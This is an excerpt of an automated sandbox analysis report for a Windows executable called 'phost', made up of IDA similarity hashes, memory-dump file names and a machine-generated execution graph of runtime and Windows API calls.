                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction ID: c61f3df4c510bdd12ff0e8001e60e0a1449cac8e2fbe8132dc8b29c4fa9e55af
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92112E32618B8182EB618F19F94026977F4FB88B98F588230DA8D4B755DF3DD5558B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction ID: c9f46e3962f408f0fb48dcd015578d8f863998336716b95769d9c5b2823da4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71017C22B1824386FF21AF68986627E67B0EF48778F80413AD54DC6691DE3CE504DA56

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:9.5%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:1741
                                                                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                                                                              execution_graph 9483 7ff62cc90110 9486 7ff62cc96df8 9483->9486 9488 7ff62cc96e5c 9486->9488 9487 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9489 7ff62cc9012d 9487->9489 9488->9487 10144 7ff62cc7de88 10145 7ff62cc7dd38 __vcrt_FlsAlloc 5 API calls 10144->10145 10146 7ff62cc7dead TlsAlloc 10145->10146 9490 7ff62cc90008 9491 7ff62cc90041 9490->9491 9494 7ff62cc9004d 9491->9494 9496 7ff62cc92eb0 9491->9496 9492 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9495 7ff62cc900f7 9492->9495 9494->9492 9497 7ff62cc92ef2 9496->9497 9498 7ff62cc8f910 _fread_nolock MultiByteToWideChar 9497->9498 9499 7ff62cc92f28 9498->9499 9500 7ff62cc92fec 9499->9500 9501 7ff62cc92f2f 9499->9501 9503 7ff62cc8d66c _fread_nolock HeapAlloc 9499->9503 9506 7ff62cc92f58 _fread_nolock 9499->9506 9500->9501 9505 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9500->9505 9502 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9501->9502 9504 7ff62cc93025 9502->9504 9503->9506 9504->9494 9505->9501 9506->9500 9507 7ff62cc8f910 _fread_nolock MultiByteToWideChar 9506->9507 9508 7ff62cc92fce 9507->9508 9508->9500 9509 7ff62cc92fd2 GetStringTypeW 9508->9509 9509->9500 9510 7ff62cc77110 9511 7ff62cc7717b 9510->9511 9513 7ff62cc77134 9510->9513 9512 7ff62cc85094 2 API calls 9512->9513 9513->9511 9513->9512 9514 7ff62cc83610 9515 7ff62cc836c5 9514->9515 9516 7ff62cc83652 9514->9516 9517 7ff62cc836ca 9515->9517 9520 7ff62cc8371f 9515->9520 9516->9520 9523 7ff62cc8365d 9516->9523 9530 7ff62cc83688 9516->9530 9518 7ff62cc836cc 9517->9518 9519 7ff62cc836ff 9517->9519 9518->9523 9525 7ff62cc836db 9518->9525 9540 7ff62cc817b0 9519->9540 9520->9530 9531 7ff62cc8375d 9520->9531 9544 7ff62cc81fd0 9520->9544 9523->9530 9523->9531 9532 7ff62cc83f74 9523->9532 9525->9530 9525->9531 9536 7ff62cc845c8 9525->9536 9526 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9528 7ff62cc839f3 9526->9528 9530->9531 9548 7ff62cc8e8c8 9530->9548 9531->9526 9533 7ff62cc83f96 9532->9533 9556 7ff62cc8e5e0 9533->9556 9535 7ff62cc840b1 9535->9530 9539 7ff62cc845e9 9536->9539 9537 7ff62cc8a884 4 API calls 9538 7ff62cc8461a 9537->9538 9538->9530 9539->9537 9539->9538 9541 7ff62cc817e3 9540->9541 9542 7ff62cc8a884 4 API calls 9541->9542 9543 7ff62cc81812 9541->9543 9542->9543 9543->9530 9545 7ff62cc82003 9544->9545 9546 7ff62cc8a884 4 API calls 9545->9546 9547 7ff62cc82032 9545->9547 9546->9547 9547->9530 9550 7ff62cc8e8f0 9548->9550 9549 7ff62cc8a884 4 API calls 9552 7ff62cc8e8f5 _fread_nolock 9549->9552 9550->9552 9555 7ff62cc8e91e _fread_nolock 9550->9555 9606 7ff62cc90858 9550->9606 9552->9530 9555->9549 9555->9552 9557 7ff62cc8e630 9556->9557 9558 7ff62cc8e5fd 9556->9558 9557->9558 9561 7ff62cc8e662 9557->9561 9559 7ff62cc8a884 4 API calls 9558->9559 9562 7ff62cc8e629 9559->9562 9561->9562 9563 7ff62cc8de64 9561->9563 9562->9535 9568 7ff62cc9411c 9563->9568 9565 7ff62cc8deaf 9566 7ff62cc8df0b 9565->9566 9597 7ff62cc8df60 9565->9597 9566->9562 9569 7ff62cc9416f fegetenv 9568->9569 9602 7ff62cc97e9c 9569->9602 9571 7ff62cc97e9c _invalid_parameter_noinfo 9573 7ff62cc942dc 9571->9573 9572 7ff62cc941c2 9572->9571 9576 7ff62cc941ef 9572->9576 9574 7ff62cc97e9c _invalid_parameter_noinfo 9573->9574 9582 7ff62cc942ed _fread_nolock _get_daylight 9574->9582 9575 7ff62cc95394 9576->9575 9577 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9576->9577 9578 7ff62cc95382 9577->9578 9578->9565 9579 7ff62cc946ff _fread_nolock 9580 7ff62cc949eb 9583 7ff62cc95124 memcpy_s 9580->9583 9584 7ff62cc94a3f 9580->9584 9581 7ff62cc94397 _fread_nolock 9592 7ff62cc947f3 _fread_nolock _get_daylight 9581->9592 9596 7ff62cc94cdb _fread_nolock _get_daylight 9581->9596 9582->9579 9582->9581 9585 7ff62cc947d0 _invalid_parameter_noinfo 9582->9585 9583->9584 9584->9584 9586 7ff62cc951c9 memcpy_s 9584->9586 9591 7ff62cc951b2 9584->9591 9585->9581 9586->9591 9587 7ff62cc95338 9588 7ff62cc97e9c _invalid_parameter_noinfo 9587->9588 9588->9576 9589 7ff62cc94946 _invalid_parameter_noinfo 9589->9592 9590 7ff62cc94e24 _invalid_parameter_noinfo 9590->9596 9591->9587 9594 7ff62cc9529e memcpy_s 9591->9594 9592->9580 9592->9589 9595 7ff62cc94c04 _invalid_parameter_noinfo 9592->9595 9593 7ff62cc95061 _invalid_parameter_noinfo 9593->9596 9594->9591 9595->9592 9596->9580 9596->9584 9596->9590 9596->9593 9598 7ff62cc8df9b 9597->9598 9601 7ff62cc8dfe8 _fread_nolock 9597->9601 9599 7ff62cc8a884 4 API calls 9598->9599 9600 7ff62cc8dfc7 9599->9600 9600->9566 9603 7ff62cc97eb9 _get_daylight 9602->9603 9605 7ff62cc97ede 9602->9605 9604 7ff62cc97ece _invalid_parameter_noinfo 9603->9604 9604->9605 9605->9572 9607 7ff62cc9087c WideCharToMultiByte 9606->9607 9620 7ff62cc7e0fc 9621 7ff62cc7e11b 9620->9621 9626 7ff62cc7e674 9621->9626 9623 7ff62cc7e129 __FrameHandler3::FrameUnwindToEmptyState 9631 7ff62cc7f8a0 9623->9631 9625 7ff62cc7e150 9627 7ff62cc7e67c 9626->9627 9630 7ff62cc7e69b 9627->9630 9640 7ff62cc8a574 9627->9640 9630->9623 9632 7ff62cc7f8cf 9631->9632 9660 7ff62cc7e5d8 9632->9660 9634 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 9636 7ff62cc7f9e3 9634->9636 9635 7ff62cc7fa00 __FrameHandler3::GetHandlerSearchState 9635->9625 9636->9635 9637 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 9636->9637 9638 7ff62cc7fa29 9637->9638 9639 7ff62cc7f8e5 __FrameHandler3::GetHandlerSearchState 9639->9634 9639->9636 9641 7ff62cc8a57d __FrameHandler3::FrameUnwindToEmptyState 9640->9641 9642 7ff62cc8a58c 9641->9642 9648 7ff62cc93710 9641->9648 9644 7ff62cc8a5bf 9642->9644 9645 7ff62cc8a595 IsProcessorFeaturePresent 9642->9645 9646 7ff62cc8a5a4 9645->9646 9652 7ff62cc8a684 9646->9652 9649 7ff62cc93767 9648->9649 9650 7ff62cc93740 _get_daylight 9648->9650 9649->9642 9650->9649 9651 7ff62cc937ee _invalid_parameter_noinfo 9650->9651 9651->9649 9653 7ff62cc8a6be _fread_nolock 9652->9653 9654 7ff62cc8a6e6 RtlCaptureContext RtlLookupFunctionEntry 9653->9654 9655 7ff62cc8a720 RtlVirtualUnwind 9654->9655 9656 7ff62cc8a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9654->9656 9655->9656 9657 7ff62cc8a7a8 9656->9657 9658 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9657->9658 9659 7ff62cc8a7c7 9658->9659 9659->9644 9661 7ff62cc7e5fa 9660->9661 9662 7ff62cc7e5ef 9660->9662 9661->9639 9664 7ff62cc7e67c 9662->9664 9665 7ff62cc7e68a 9664->9665 9666 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 9665->9666 9668 7ff62cc7e69b 9665->9668 9667 7ff62cc7e6e1 9666->9667 9668->9661 10152 7ff62cc87e78 10153 7ff62cc87e94 10152->10153 10154 7ff62cc87f02 10152->10154 10153->10154 10157 7ff62cc87e99 10153->10157 10163 7ff62cc90830 10154->10163 10156 7ff62cc87eb1 __std_exception_destroy 10157->10156 10159 7ff62cc87d94 10157->10159 10160 7ff62cc87e08 _fread_nolock 10159->10160 10162 7ff62cc87dbd _fread_nolock _get_daylight 10159->10162 10160->10156 10161 7ff62cc87e3a _invalid_parameter_noinfo 10161->10160 10162->10160 10162->10161 10166 7ff62cc90640 10163->10166 10167 7ff62cc90682 10166->10167 10176 7ff62cc9066b _fread_nolock _get_daylight 10166->10176 10168 7ff62cc90686 10167->10168 10169 7ff62cc906a7 10167->10169 10180 7ff62cc907ac 10168->10180 10188 7ff62cc8f628 10169->10188 10172 7ff62cc9068b 10172->10176 10177 7ff62cc906d3 10172->10177 10173 7ff62cc90676 _invalid_parameter_noinfo 10179 7ff62cc9067b __std_exception_destroy 10173->10179 10174 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10175 7ff62cc907a1 10174->10175 10175->10156 10176->10173 10176->10179 10178 7ff62cc87d94 _invalid_parameter_noinfo 10177->10178 10177->10179 10178->10179 10179->10174 10181 7ff62cc907f6 10180->10181 10184 7ff62cc907c6 _fread_nolock _get_daylight 10180->10184 10182 7ff62cc90801 GetDriveTypeW 10181->10182 10183 7ff62cc907e1 10181->10183 10182->10183 10185 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10183->10185 10186 7ff62cc907d6 _invalid_parameter_noinfo 10184->10186 10187 7ff62cc907f0 10185->10187 10186->10183 10187->10172 10200 7ff62cc9a540 10188->10200 10191 7ff62cc8f69c 10192 7ff62cc8ec08 _fread_nolock HeapAlloc 10191->10192 10195 7ff62cc8f6ab 10192->10195 10193 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10196 7ff62cc8f709 10193->10196 10194 7ff62cc8f675 10194->10193 10197 7ff62cc8f6b5 GetCurrentDirectoryW 10195->10197 10198 7ff62cc8f6c4 _get_daylight 10195->10198 10196->10172 10197->10198 10199 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10198->10199 10199->10194 10201 7ff62cc8f65e GetCurrentDirectoryW 10200->10201 10201->10191 10201->10194 9455 7ff62cc8c084 9457 7ff62cc8c0db 9455->9457 9463 7ff62cc8c0ad 9455->9463 9456 7ff62cc8c0f4 9458 7ff62cc8a884 4 API calls 9456->9458 9457->9456 9459 7ff62cc8c14b 9457->9459 9458->9463 9460 7ff62cc8c169 9459->9460 9461 7ff62cc8c1a4 _fread_nolock 3 API calls 9459->9461 9464 7ff62cc88568 LeaveCriticalSection 9460->9464 9461->9460 9669 7ff62cc88804 9670 7ff62cc8883f 9669->9670 9673 7ff62cc88843 9670->9673 9698 7ff62cc91668 9670->9698 9672 7ff62cc888b5 9675 7ff62cc91668 9 API calls 9672->9675 9676 7ff62cc88869 9672->9676 9673->9672 9674 7ff62cc91668 9 API calls 9673->9674 9677 7ff62cc88a0d 9673->9677 9674->9672 9675->9676 9679 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9676->9679 9678 7ff62cc88865 9678->9676 9680 7ff62cc8889e 9678->9680 9681 7ff62cc91668 9 API calls 9678->9681 9682 7ff62cc888e5 9679->9682 9683 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9680->9683 9684 7ff62cc8888e 9681->9684 9688 7ff62cc88929 __std_exception_destroy 9682->9688 9707 7ff62cc915f0 9682->9707 9683->9673 9684->9680 9685 7ff62cc88892 9684->9685 9686 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9685->9686 9686->9676 9689 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9688->9689 9690 7ff62cc88938 9689->9690 9691 7ff62cc889a7 9691->9677 9693 7ff62cc915f0 _invalid_parameter_noinfo 9691->9693 9695 7ff62cc889be 9691->9695 9693->9695 9694 7ff62cc915f0 _invalid_parameter_noinfo 9694->9691 9695->9677 9695->9688 9696 7ff62cc889f6 __std_exception_destroy 9695->9696 9697 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9696->9697 9697->9690 9699 7ff62cc916a1 9698->9699 9703 7ff62cc91684 _fread_nolock _get_daylight 9698->9703 9700 7ff62cc916a9 GetFileAttributesExW 9699->9700 9699->9703 9701 7ff62cc916c7 _fread_nolock _get_daylight 9700->9701 9702 7ff62cc916ba GetLastError 9700->9702 9705 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9701->9705 9702->9701 9704 7ff62cc91691 _invalid_parameter_noinfo 9703->9704 9704->9701 9706 7ff62cc9170c 9705->9706 9706->9678 9710 7ff62cc91600 _get_daylight 9707->9710 9708 7ff62cc91617 _invalid_parameter_noinfo 9709 7ff62cc88969 9708->9709 9709->9677 9709->9691 9709->9694 9710->9708 9710->9709 10202 7ff62cc89084 10203 7ff62cc890a4 10202->10203 10207 7ff62cc890bb 10202->10207 10204 7ff62cc890c2 GetModuleFileNameW 10203->10204 10205 7ff62cc890ac _get_daylight 10203->10205 10208 7ff62cc890ed 10204->10208 10206 7ff62cc890b1 _invalid_parameter_noinfo 10205->10206 10206->10207 10209 7ff62cc89024 3 API calls 10208->10209 10210 7ff62cc8912d 10209->10210 10211 7ff62cc89135 _get_daylight 10210->10211 10214 7ff62cc8914d 10210->10214 10212 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10211->10212 10212->10207 10213 7ff62cc8916f 10215 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10213->10215 10214->10213 10216 7ff62cc891b4 10214->10216 10217 7ff62cc8919b 10214->10217 10215->10207 10219 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10216->10219 10218 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10217->10218 10220 7ff62cc891a4 10218->10220 10219->10213 10221 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10220->10221 10221->10207 10222 7ff62cc80d84 10223 7ff62cc80dc3 10222->10223 10224 7ff62cc80db1 _get_daylight 10222->10224 10226 7ff62cc80dd0 10223->10226 10229 7ff62cc80e0d _get_daylight 10223->10229 10225 7ff62cc80db6 _invalid_parameter_noinfo 10224->10225 10232 7ff62cc80df5 10225->10232 10227 7ff62cc8a884 4 API calls 10226->10227 10227->10232 10228 7ff62cc80eb8 _get_daylight 10231 7ff62cc80f60 _invalid_parameter_noinfo 10228->10231 10228->10232 10229->10228 10230 7ff62cc80eab _invalid_parameter_noinfo 10229->10230 10230->10228 10231->10232 9711 7ff62cc74100 9712 7ff62cc74126 9711->9712 9713 7ff62cc7415d 9712->9713 9714 7ff62cc74550 6 API calls 9712->9714 9715 7ff62cc7416f 9714->9715 9716 7ff62cc83000 9717 7ff62cc8303e 9716->9717 9718 7ff62cc8302e 9716->9718 9719 7ff62cc83047 9717->9719 9723 7ff62cc83075 9717->9723 9720 7ff62cc8a884 4 API calls 9718->9720 9721 7ff62cc8a884 4 API calls 9719->9721 9722 7ff62cc8306d 9720->9722 9721->9722 9723->9718 9723->9722 9725 7ff62cc83a14 9723->9725 9726 7ff62cc83a56 9725->9726 9728 7ff62cc83ac7 9725->9728 9733 7ff62cc83a5c 9726->9733 9734 7ff62cc81dc4 9726->9734 9728->9726 9729 7ff62cc83ae2 9728->9729 9728->9733 9731 7ff62cc845c8 4 API calls 9729->9731 9729->9733 9730 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9732 7ff62cc83e5a 9730->9732 9731->9733 9732->9723 9733->9730 9735 7ff62cc81df7 9734->9735 9736 7ff62cc8a884 4 API calls 9735->9736 9737 7ff62cc81e26 9735->9737 9736->9737 9737->9733 9738 7ff62cc8f9fc 9739 7ff62cc8fbe4 _get_daylight 9738->9739 9742 7ff62cc8fa3e 9738->9742 9740 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9739->9740 9741 7ff62cc8fc09 9740->9741 9742->9739 9753 7ff62cc96204 9742->9753 9747 7ff62cc8fc1a 9752 7ff62cc8fbd5 _isindst 9752->9739 9754 7ff62cc96213 9753->9754 9756 7ff62cc8fadc 9753->9756 9754->9756 9769 7ff62cc96074 9754->9769 9757 7ff62cc95608 9756->9757 9758 7ff62cc95611 _get_daylight 9757->9758 9759 7ff62cc8faf1 9757->9759 9760 7ff62cc95616 _invalid_parameter_noinfo 9758->9760 9759->9747 9761 7ff62cc95638 9759->9761 9760->9759 9762 7ff62cc95641 _get_daylight 9761->9762 9763 7ff62cc8fb02 9761->9763 9764 7ff62cc95646 _invalid_parameter_noinfo 9762->9764 9763->9747 9765 7ff62cc95668 9763->9765 9764->9763 9766 7ff62cc95671 _get_daylight 9765->9766 9767 7ff62cc8fb13 9765->9767 9768 7ff62cc95676 _invalid_parameter_noinfo 9766->9768 9767->9739 9767->9747 9767->9752 9768->9767 9770 7ff62cc960cb 9769->9770 9772 7ff62cc8d66c _fread_nolock HeapAlloc 9770->9772 9783 7ff62cc960cf 9770->9783 9771 7ff62cc960e8 9776 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9771->9776 9774 7ff62cc96122 9772->9774 9775 7ff62cc9612a 9774->9775 9781 7ff62cc96155 9774->9781 9779 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9775->9779 9777 7ff62cc960f0 9776->9777 9778 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9777->9778 9780 7ff62cc96100 9778->9780 9779->9783 9780->9756 9782 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9781->9782 9782->9783 9783->9771 9784 7ff62cc95eec 9783->9784 9785 7ff62cc95f00 9784->9785 9786 7ff62cc95668 _get_daylight _invalid_parameter_noinfo 9785->9786 9787 7ff62cc95f1f 9786->9787 9788 7ff62cc95608 _get_daylight _invalid_parameter_noinfo 9787->9788 9793 7ff62cc9605f 9787->9793 9789 7ff62cc95f30 9788->9789 9790 7ff62cc95638 _get_daylight _invalid_parameter_noinfo 9789->9790 9789->9793 9791 7ff62cc95f41 9790->9791 9792 7ff62cc95f49 9791->9792 9791->9793 9794 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9792->9794 9795 7ff62cc960cf 9793->9795 9797 7ff62cc8d66c _fread_nolock HeapAlloc 9793->9797 9798 7ff62cc95f55 GetTimeZoneInformation 9794->9798 9796 7ff62cc960e8 9795->9796 9800 7ff62cc95eec 12 API calls 9795->9800 9801 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9796->9801 9799 7ff62cc96122 9797->9799 9802 7ff62cc95f72 _fread_nolock 9798->9802 9807 7ff62cc9612a 9799->9807 9808 7ff62cc96155 9799->9808 9800->9796 9803 7ff62cc960f0 9801->9803 9802->9771 9804 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9803->9804 9806 7ff62cc96100 9804->9806 9805 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9805->9795 9806->9771 9807->9805 9809 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9808->9809 9809->9795 8538 7ff62cc7ccac 8547 7ff62cc7ce7c 8538->8547 8540 7ff62cc7cd0b 8541 7ff62cc7cd91 __scrt_get_show_window_mode 8542 7ff62cc7cd9e 8541->8542 8553 7ff62cc71000 8542->8553 8543 7ff62cc7ccc0 __scrt_acquire_startup_lock __scrt_release_startup_lock 8543->8540 8543->8541 8545 7ff62cc7cdb2 8545->8540 8625 7ff62cc7d000 8545->8625 8548 7ff62cc7ce84 8547->8548 8549 7ff62cc7ce90 __scrt_dllmain_crt_thread_attach 8548->8549 8550 7ff62cc7ce99 8549->8550 8551 7ff62cc7ce9d 8549->8551 8550->8543 8551->8550 8629 7ff62cc7d8f8 8551->8629 8554 7ff62cc71009 8553->8554 8632 7ff62cc736b0 8554->8632 8563 7ff62cc7396a 8706 7ff62cc72710 8563->8706 8566 7ff62cc7395d 8567 7ff62cc73962 8566->8567 8570 7ff62cc73984 8566->8570 8702 7ff62cc800bc 8567->8702 8568 7ff62cc7383c __std_exception_destroy 8575 7ff62cc73b2f 8568->8575 8578 7ff62cc73a60 __std_exception_destroy 8568->8578 8570->8570 8571 7ff62cc71950 57 API calls 8570->8571 8572 7ff62cc739ce 8571->8572 8572->8568 8573 7ff62cc739de 8572->8573 8574 7ff62cc72710 9 API calls 8573->8574 8577 7ff62cc73808 __std_exception_destroy 8574->8577 8576 7ff62cc72710 9 API calls 8575->8576 8576->8577 8724 7ff62cc7c5c0 8577->8724 8579 7ff62cc73c50 8578->8579 8584 7ff62cc73cd4 8578->8584 8592 7ff62cc73d2b __std_exception_destroy 8578->8592 8714 7ff62cc790e0 8579->8714 8582 7ff62cc73cb3 8732 7ff62cc78850 8582->8732 8583 7ff62cc73c61 8588 7ff62cc72710 9 API calls 8583->8588 8584->8583 8586 7ff62cc73ced 8584->8586 8586->8592 8593 7ff62cc73d12 8586->8593 8588->8577 8589 7ff62cc73cc8 8589->8592 8590 7ff62cc73cbf 8590->8583 8591 7ff62cc73da7 SetDllDirectoryW LoadLibraryExW 8594 7ff62cc73dc4 8591->8594 8592->8591 8592->8594 8596 7ff62cc72710 9 API calls 8593->8596 8595 7ff62cc73de8 SetDllDirectoryW 8594->8595 8604 7ff62cc73e0a __std_exception_destroy 8595->8604 8620 7ff62cc73e5a 8595->8620 8596->8577 8597 7ff62cc73ffc 8598 7ff62cc74029 8597->8598 8599 7ff62cc74006 PostMessageW GetMessageW 8597->8599 8680 7ff62cc73360 8598->8680 8599->8598 8600 7ff62cc73f1b 8600->8577 8772 7ff62cc790c0 LocalFree 8600->8772 8603 7ff62cc74039 8773 7ff62cc73670 8603->8773 8604->8620 8744 7ff62cc76db0 8604->8744 8609 7ff62cc76fb0 FreeLibrary 8611 7ff62cc7404f 8609->8611 8614 7ff62cc73e6c 8618 7ff62cc73e85 8614->8618 8748 7ff62cc76df0 8614->8748 8618->8620 8765 7ff62cc76fb0 8618->8765 8620->8597 8620->8600 8626 7ff62cc7d011 8625->8626 8627 7ff62cc7d021 8626->8627 8628 7ff62cc7d8f8 2 API calls 8626->8628 8627->8540 8628->8627 8630 7ff62cc7d90a 8629->8630 8631 7ff62cc7d900 __vcrt_uninitialize_ptd __vcrt_uninitialize_locks 8629->8631 8630->8550 8631->8630 8777 7ff62cc7c8c0 8632->8777 8635 7ff62cc736eb GetLastError 8637 7ff62cc73706 8635->8637 8636 7ff62cc73710 8779 7ff62cc792f0 FindFirstFileExW 8636->8779 8640 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8637->8640 8639 7ff62cc7371a 8642 7ff62cc7374c 8639->8642 8643 7ff62cc73734 8639->8643 8641 7ff62cc737b5 8640->8641 8641->8577 8646 7ff62cc71950 8641->8646 8642->8637 8644 7ff62cc72810 7 API calls 8642->8644 8784 7ff62cc72810 8643->8784 8644->8637 8647 7ff62cc745b0 40 API calls 8646->8647 8648 7ff62cc71985 8647->8648 8650 7ff62cc77f80 34 API calls 8648->8650 8656 7ff62cc71c43 8648->8656 8649 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8651 7ff62cc71c5e 8649->8651 8652 7ff62cc719cb 8650->8652 8651->8568 8687 7ff62cc745b0 8651->8687 8679 7ff62cc71a03 8652->8679 8789 7ff62cc80744 8652->8789 8654 7ff62cc800bc 11 API calls 8654->8656 8655 7ff62cc719e5 8657 7ff62cc71a08 8655->8657 8658 7ff62cc719e9 _get_daylight 8655->8658 8656->8649 8793 7ff62cc8040c 8657->8793 8796 7ff62cc72910 8658->8796 8662 7ff62cc71a26 _get_daylight 8665 7ff62cc72910 9 API calls 8662->8665 8663 7ff62cc71a45 8664 7ff62cc71a5c _get_daylight 8663->8664 8667 7ff62cc71a7b 8663->8667 8666 7ff62cc72910 9 API calls 8664->8666 8665->8679 8666->8679 8668 7ff62cc80744 7 API calls 8667->8668 8669 7ff62cc71b01 8668->8669 8670 7ff62cc71b16 _get_daylight 8669->8670 8671 7ff62cc71b35 8669->8671 8674 7ff62cc72910 9 API calls 8670->8674 8672 7ff62cc8040c _fread_nolock 23 API calls 8671->8672 8673 7ff62cc71b4a 8672->8673 8675 7ff62cc71b50 _get_daylight 8673->8675 8676 7ff62cc71b6f 8673->8676 8674->8679 8677 7ff62cc72910 9 API calls 8675->8677 8678 7ff62cc72710 9 API calls 8676->8678 8676->8679 8677->8679 8678->8679 8679->8654 8956 7ff62cc76350 8680->8956 8683 7ff62cc7338d 8683->8603 8685 7ff62cc73381 8685->8683 9011 7ff62cc76040 8685->9011 8688 7ff62cc745bc 8687->8688 9164 7ff62cc86004 8688->9164 8690 7ff62cc74606 8691 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8690->8691 8692 7ff62cc7392b 8691->8692 8692->8563 8693 7ff62cc77f80 8692->8693 8694 7ff62cc77fa4 8693->8694 8695 7ff62cc80744 7 API calls 8694->8695 8698 7ff62cc7807b __std_exception_destroy 8694->8698 8696 7ff62cc77fc0 8695->8696 8696->8698 9237 7ff62cc87938 8696->9237 8698->8566 8699 7ff62cc80744 7 API calls 8701 7ff62cc77fd5 8699->8701 8700 7ff62cc8040c _fread_nolock 23 API calls 8700->8701 8701->8698 8701->8699 8701->8700 8703 7ff62cc800ec 8702->8703 9261 7ff62cc7fe98 8703->9261 8705 7ff62cc80105 8705->8563 8707 7ff62cc7c8c0 8706->8707 8708 7ff62cc72734 GetCurrentProcessId 8707->8708 8709 7ff62cc72787 8708->8709 8710 7ff62cc72620 8 API calls 8709->8710 8711 7ff62cc727f1 8710->8711 8712 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 8711->8712 8713 7ff62cc72801 8712->8713 8713->8577 8715 7ff62cc790f5 8714->8715 9308 7ff62cc78760 GetCurrentProcess OpenProcessToken 8715->9308 8718 7ff62cc78760 7 API calls 8719 7ff62cc79121 